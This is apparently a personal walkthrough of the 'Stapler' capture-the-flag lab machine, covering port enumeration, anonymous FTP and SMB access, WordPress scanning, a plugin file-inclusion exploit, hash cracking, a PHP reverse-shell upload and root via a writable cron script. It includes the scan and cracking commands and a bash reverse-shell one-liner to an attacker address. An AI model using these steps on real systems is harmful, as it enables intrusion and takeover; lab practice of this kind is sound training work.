🐧Stapler

Enumeration

Nmap scan

nmap -sV -p- -A 192.168.197.148

Service Enumeration

Port 21

Port 21 allows anonymous FTP login.

Note file from FTP.

Now we know we have at least three user's Harry, Elly, and John.

Port 80

Port 139

SMB allows anonymous login.

Grabbed all files from kathy and tmp.

Port 12380

Nikto scan

DOH!

So I'm an idiot and spent a few hours wondering why I could do no scans against this box's web servers..... its using HTTPS not HTTP.

The continued IP is 192.168.87.148 Gobuster scan

gobuster dir -k -u  https://192.168.87.148:12380/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,php  -t 200

Robots.txt

Interesting places

WPScan

wpscan  --url https://192.168.87.148:12380/blogblog --disable-tls-checks --enumerate

Had to get a hint here.

List of plugins.

Had to get a hint here was not finding anything on WPScans website about these plugins. Found that searchsploit would bring up an exploit is seached for advance video.

Having trouble getting this exploit from searchsploit to run. Found another python exploit at https://github.com/gtech/39646/blob/master/39646.py this one is working for LFI.

Port 3306

Connected via MySQL

mysql -uroot -pplbkac -h192.168.87.148

Port 12380 - Revisited

Used root credentials to log into myphpadmin webpage.

Returned on 1/23/2023. New IP is 192.168.112.148 Grabbed all the hashes for cracking.

Cracking the hashes.

john hashes.txt  --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Found that John was an admin user when checking the accounts.

Found that I could upload my own plugin. Uploaded my shell. Found that it will prompt for a FTP login but one is not required it will still upload the file.

Found the shell in /blogblog/wp-content/uploads/

Shell

Opened rev3.php for my shell.

Stabilized the shell.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg 
stty rows 38 columns 116

Dropped Linpeas on the machine. Found an interesting file I could edit.

Added reverse shell to cron-logrotate.sh and waited a few minutes.

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.49.112/6698 <&1'" > cron-logrotate.sh

Root

PreviousInfoSecPrepNextBBSCute

Last updated

Was this helpful?